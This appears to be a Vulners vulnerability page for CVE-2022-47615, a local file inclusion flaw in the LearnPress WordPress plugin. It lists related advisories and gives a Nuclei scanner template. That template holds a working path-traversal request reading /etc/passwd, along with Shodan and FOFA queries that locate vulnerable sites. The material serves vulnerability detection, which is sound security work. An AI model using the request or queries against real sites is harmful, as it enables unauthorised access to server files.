| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Thimpress Learnpress | 18 Aug 202315:04 | – | githubexploit | |
| The vulnerability of the list_courses() function in the LearnPress plugin of the WordPress content management system allows a hacker to gain unauthorized access to protected information. | 9 Nov 202300:00 | – | bdu_fstec | |
| CVE-2022-47615 | 28 Apr 202600:00 | – | circl | |
| WordPress plugin LMS LearnPress 代码问题漏洞 | 26 Jan 202300:00 | – | cnnvd | |
| CVE-2022-47615 | 24 Jan 202309:05 | – | cve | |
| CVE-2022-47615 WordPress LearnPress Plugin <= 4.1.7.3.2 is vulnerable to Local File Inclusion | 24 Jan 202309:05 | – | cvelist | |
| Update your LearnPress plugins now! | 30 Jan 202312:15 | – | malwarebytes | |
| CVE-2022-47615 | 26 Jan 202321:18 | – | nvd | |
| WordPress LearnPress Plugin <= 4.1.7.3.2 Multiple Vulnerabilities | 26 Jan 202300:00 | – | openvas | |
| CVE-2022-47615 | 26 Jan 202321:18 | – | osv |
id: CVE-2022-47615
info:
name: LearnPress Plugin < 4.2.0 - Local File Inclusion
author: DhiyaneshDK
severity: critical
description: |
Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.
remediation: |
Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.
reference:
- https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2022-47615
- https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2022-47615
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47615
cwe-id: CWE-434
epss-score: 0.05063
epss-percentile: 0.91286
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
shodan-query: http.html:/wp-content/plugins/learnpress
fofa-query: body=/wp-content/plugins/learnpress
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress,vkev,vuln
http:
- raw:
- |
GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- '"status":'
- '"pagination":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100d0b226ac486298d7e4b12a4070963f6d650052bfd8ae56ff6e0662457751c58d02201881b7ceaee407029bb3624813e8b2141de717c2485089f9afcdc5ebb840ae05:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation